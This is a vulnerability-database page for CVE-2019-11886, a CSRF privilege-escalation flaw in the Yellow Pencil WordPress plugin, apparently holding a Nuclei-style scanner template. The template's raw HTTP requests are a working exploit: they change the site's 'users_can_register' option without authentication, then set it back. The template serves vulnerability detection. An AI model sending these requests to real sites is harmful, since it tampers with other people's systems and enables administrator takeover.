| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2019-11886 | 18 Sep 202501:43 | – | circl | |
| WordPress WaspThemes Visual CSS Style Editor plugin cross-site request forgery vulnerability | 13 May 201900:00 | – | cnvd | |
| CVE-2019-11886 | 13 May 201904:03 | – | cve | |
| CVE-2019-11886 | 13 May 201904:03 | – | cvelist | |
| EUVD-2019-3544 | 13 May 201904:03 | – | euvd | |
| CVE-2019-11886 | 13 May 201905:29 | – | nvd | |
| WordPress WaspThemes Visual CSS Style Editor Plugin < 7.2.1 CSRF Vulnerability | 22 May 201900:00 | – | openvas | |
| CVE-2019-11886 | 13 May 201905:29 | – | osv | |
| Cross site request forgery (csrf) | 13 May 201905:29 | – | prion | |
| CVE-2019-11886 | 9 Jan 202610:09 | – | redhatcve |
id: CVE-2019-11886
info:
name: Yellow Pencil Visual Theme Customizer < 7.2.1 - Privilege Escalation
author: daffainfo
severity: high
description: |
The WaspThemes Visual CSS Style Editor (aka yellow-pencil-visual-theme-customizer) plugin before 7.2.1 for WordPress allows yp_option_update CSRF, as demonstrated by use of yp_remote_get to obtain admin access.
impact: |
Unauthenticated attackers can exploit CSRF to escalate privileges to administrator level, gaining complete control over the WordPress site including content manipulation and user management.
remediation: |
Upgrade to Yellow Pencil Visual Theme Customizer version 7.2.1 or later.
reference:
- https://www.wordfence.com/blog/2019/04/zero-day-vulnerability-in-yellow-pencil-visual-theme-customizer-exploited-in-the-wild/
- https://web.archive.org/web/20190410184502/https://www.pluginvulnerabilities.com/2019/04/09/recently-closed-visual-css-style-editor-wordpress-plugin-contains-privilege-escalation-vulnerability-that-leads-to-option-update-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2019-11886
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-11886
epss-score: 0.0189
epss-percentile: 0.77069
cwe-id: CWE-352
cpe: cpe:2.3:a:yellowpencil:visual_css_style_editor:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: waspthemes
product: yellow_pencil_visual_theme_customizer
framework: wordpress
fofa-query: body="wp-content/plugins/yellow-pencil-visual-theme-customizer/" && body="wp-"
tags: cve,cve2019,wp,wordpress,wp-plugin,yellow-pencil-visual-theme-customizer,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-post.php?yp_remote_get=test HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
yp_json_import_data=[{"users_can_register":"MQ=="}]
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body_2, 'wp-login-register')"
- "contains(body_2, '/wp-login.php?action=lostpassword')"
- 'status_code_2 == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-post.php?yp_remote_get=test HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
yp_json_import_data=[{"users_can_register":"MA=="}]
- |
GET /wp-login.php?{{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "!contains(body_2, 'wp-login-register')"
- "contains(body_2, '/wp-login.php?action=lostpassword')"
- 'status_code_2 == 200'
condition: and
# digest: 4b0a00483046022100ed7492a31190a6ef6796a006068be435a5208b26d490081522b18147b1f114fb022100c69cdbe7a78de109318d45f43cc65271d20e3251781dd01a4a5f51a935a24c90:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation